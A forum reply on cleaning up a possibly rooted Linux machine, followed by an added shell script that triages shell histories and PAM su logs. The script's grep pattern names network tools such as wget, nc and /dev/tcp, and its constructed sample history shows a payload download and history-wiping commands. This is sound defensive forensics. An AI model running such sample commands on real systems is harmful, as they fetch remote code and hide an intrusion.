If your attacker managed to alter your FTP and SSH configs, then I'd say it's a fair bet that she does have root on your machine. That being the case, any cleanup short of a clean install is asking for trouble. Have a look at root's .bash_history and any other shell histories you can think of. Have a look at /var/log/messages - I don't know about Debian, but RH logs any 'su' events there, through PAM.
As for how the exploit works, I'd open a new thread to see if anyone can answer that. I know the theory behind general cracking methods, but I'm not familiar with any implementations.
Dave
Last edited by ilikejam; 08-18-2005 at 11:41 AM.
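To make the triage Dave describes concrete, here is an added example (my own script, not code from the post or from the original poster) that walks shell histories under a set of home directories, flags history lines touching the things mentioned above (sshd and ftpd configs, plus the usual post-compromise housekeeping), and pulls "who became whom" out of pam_unix's su records. The function names (list_histories, flag_history, su_events), the SUSPICIOUS pattern and all sample files are my own; the sample history and log lines are constructed, not taken from a real box, and the log format assumed is pam_unix's "session opened for user root by dave(uid=500)" line, which RH writes to /var/log/messages or /var/log/secure and Debian writes to /var/log/auth.log. Run it from a shell you trust (or against a mounted image), and treat everything it prints as a lead rather than proof: someone with root can edit histories and logs just as easily as sshd_config.

```shell
#!/bin/sh
# Added example, not the original poster's code: first-pass triage of shell
# histories and PAM 'su' records on a Linux box that may be rooted.

# Which shell history files exist under each given home directory, and how
# many lines each has. No history at all under a home that clearly gets used
# (root's, for instance) is itself a finding: intruders commonly
# 'unset HISTFILE' or truncate the file before they leave.
list_histories() {
    for home in "$@"; do
        found=0
        for f in "$home/.bash_history" "$home/.sh_history" \
                 "$home/.zsh_history" "$home/.history"; do
            [ -f "$f" ] || continue
            found=1
            printf '%s\t%s\n' "$(wc -l < "$f" | tr -d ' ')" "$f"
        done
        [ "$found" -eq 1 ] || \
            printf 'NONE\t%s (no history file: removed or HISTFILE unset?)\n' "$home"
    done
}

# History lines worth a second look: edits to the SSH/FTP daemon configs the
# post mentions, account changes, downloads, and anti-forensics. The pattern
# is a hand-picked starting point (my assumption), not a signature database.
SUSPICIOUS='sshd_config|ftpd\.conf|authorized_keys|useradd|usermod|passwd|chattr|HISTFILE|history -c|wget |curl |nc |/dev/tcp'
flag_history() {
    # $1 = history file; prints "lineno:command" for each hit, nothing if none.
    grep -n -E "$SUSPICIOUS" "$1" 2>/dev/null || true
}

# pam_unix 'su' session records, reduced to "who -> became". Matches both the
# older "su(pam_unix)[pid]: session opened ..." and the newer
# "su[pid]: pam_unix(su:session): session opened ..." spellings. An empty
# left-hand side means PAM logged "by (uid=0)" with no originating user.
su_events() {
    grep -h -E 'su(\(pam_unix\))?\[[0-9]+\]: .*session opened for user' "$@" 2>/dev/null \
    | sed -E 's/.*session opened for user ([^ ]+) by ([^( ]*).*/\2 -> \1/'
}

# Constructed sample data so the script runs offline; none of this is a real
# capture (198.51.100.7 is a documentation address).
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
mkdir -p "$SAMPLE_DIR/root" "$SAMPLE_DIR/home/dave" "$SAMPLE_DIR/home/www"
cat > "$SAMPLE_DIR/root/.bash_history" <<'EOF'
ls -la /etc
vi /etc/ssh/sshd_config
vi /etc/vsftpd/vsftpd.conf
wget http://198.51.100.7/x.tgz
chattr +i /usr/bin/ls
unset HISTFILE
EOF
cat > "$SAMPLE_DIR/home/dave/.bash_history" <<'EOF'
cd projects
make
su -
EOF
cat > "$SAMPLE_DIR/messages" <<'EOF'
Aug 18 11:40:01 box su(pam_unix)[4211]: session opened for user root by dave(uid=500)
Aug 18 11:41:10 box su(pam_unix)[4300]: session opened for user root by www(uid=48)
Aug 18 11:42:00 box su(pam_unix)[4300]: session closed for user root
Aug 18 11:43:12 box sshd[4388]: Accepted password for www from 198.51.100.7 port 40211 ssh2
EOF

echo '== shell histories (lines, path) =='
list_histories "$SAMPLE_DIR/root" "$SAMPLE_DIR/home/dave" "$SAMPLE_DIR/home/www"
echo '== flagged lines in root history =='
flag_history "$SAMPLE_DIR/root/.bash_history"
echo '== su sessions (who -> became) =='
su_events "$SAMPLE_DIR/messages"
```

On a real system you would point list_histories at /root and /home/*, and su_events at /var/log/messages or /var/log/secure (RH) or /var/log/auth.log (Debian) plus the rotated copies. The "www -> root" line in the sample is the kind of thing to chase: a service account becoming root is rarely legitimate, and correlating its timestamp with the sshd "Accepted password" line for the same account and source address is the next step.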